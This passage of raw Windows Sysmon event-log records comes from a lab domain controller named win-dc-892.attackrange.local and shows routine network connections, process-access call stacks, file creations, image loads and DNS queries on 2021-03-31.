354300x80000000000000004608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.457{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53573-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000004607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.457{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\System32\efsui.exeATTACKRANGE\Administratortcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53573-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 10341000x80000000000000004606Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.443{266CAFBE-646C-6064-1000-00000000AE01}11242368C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-A400-00000000AE01}4212C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004605Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.443{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-A400-00000000AE01}4212C:\Windows\Explorer.EXE0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004604Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.443{266CAFBE-64C4-6064-A400-00000000AE01}4212ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog.etlMD5=184FA94EBB57B2609A3F5C014A01CC0D,SHA256=DCB008A7EA59EDDC58DF5FA0C952752415AF5C8017DE4535C9DE1683B1A386D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.334{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.303{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=3207325087B5FCCDC86B73C020520D4E,SHA256=2C22B9743F87358DF276462B2C0FF713C15A98622874FD0E8B48C72B9AB297C3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000004601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.161{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53572-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000004600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.161{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\System32\efsui.exeATTACKRANGE\Administratortcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53572-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local389ldap 354300x80000000000000004599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.968{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-892.attackrange.local53571-false10.0.1.14win-dc-892.attackrange.local389ldap 354300x80000000000000004598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:11.968{266CAFBE-64C3-6064-9800-00000000AE01}4824C:\Windows\System32\efsui.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-892.attackrange.local53571-false10.0.1.14win-dc-892.attackrange.local389ldap 10341000x80000000000000004597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.194{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.194{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.194{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.194{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.194{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64C4-6064-A400-00000000AE01}4212C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000004592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.194{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63491B1588D81B7F6CA2C093548A28BD,SHA256=9B473AA81050C5EC6737500C762D811A7D7274CCD2E8639A51D4BB8BB5DA4CE6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.194{266CAFBE-64C4-6064-A200-00000000AE01}31083356C:\Windows\system32\userinit.exe{266CAFBE-64C4-6064-A400-00000000AE01}4212C:\Windows\Explorer.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\userinit.exe+1cd8|C:\Windows\system32\userinit.exe+23e5|C:\Windows\system32\userinit.exe+346e|C:\Windows\system32\userinit.exe+3725|C:\Windows\system32\userinit.exe+4553|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000004590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.986{266CAFBE-64C4-6064-A400-00000000AE01}4212C:\Windows\explorer.exe10.0.14393.4169 (rs1_release.210107-1130)Windows ExplorerMicrosoft® Windows® Operating SystemMicrosoft CorporationEXPLORER.EXEC:\Windows\Explorer.EXEC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=F7FDECA990692D53D7E4E396B0BD711E,SHA256=1F955612E7DB9BB037751A89DAE78DFAF03D7C1BCC62DF2EF019F6CFE6D1BBA7,IMPHASH=8D2880102609AA4B23679BD4FEBEBC95{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\System32\userinit.exeC:\Windows\system32\userinit.exe 23542300x80000000000000004589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.179{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=FFA4B0C15636092E9C834AA4026664E9,SHA256=B58597776FC71E285816E01AFA37FDCA709FE4260C854FD749C884FE56D83B31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.179{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB3EF7B99C8654EBB2526F8DEE0FC03E,SHA256=5CCFA0FC300F720A4D87618867613C1CA5652AB0F7B569D613CE11116702E35A,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000004587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.163{266CAFBE-64C4-6064-A300-00000000AE01}5052C:\Windows\System32\taskhostw.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 13241300x80000000000000004586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:13.148{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000618) 22542200x80000000000000004697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:13.188{266CAFBE-64C4-6064-A300-00000000AE01}5052win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\taskhostw.exe 22542200x80000000000000004696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.166{266CAFBE-64C3-6064-9800-00000000AE01}4824win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\System32\efsui.exe 10341000x80000000000000004695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.455{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.455{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.455{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.455{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 734700x80000000000000004691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.440{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000004690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.424{266CAFBE-64C6-6064-A800-00000000AE01}25122524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.346{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.331{266CAFBE-64C6-6064-A900-00000000AE01}34044568C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.331{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.284{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AA84EBE69F5C997D9BD051CDCFFF13B,SHA256=1590D2B72DD69CCA9CA9B0A59D29C991612EBB02556F9183318A0D55A5DAB57C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000004685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.253{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=156C759C1B0AF02A777AA64C20C98937,SHA256=8C7B033C02098ADE42EB17B191F63E134F6B044103F8BC2892A598A9BDF8B0F9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:14.253{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64C6-6064-A800-00000000AE01}2512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 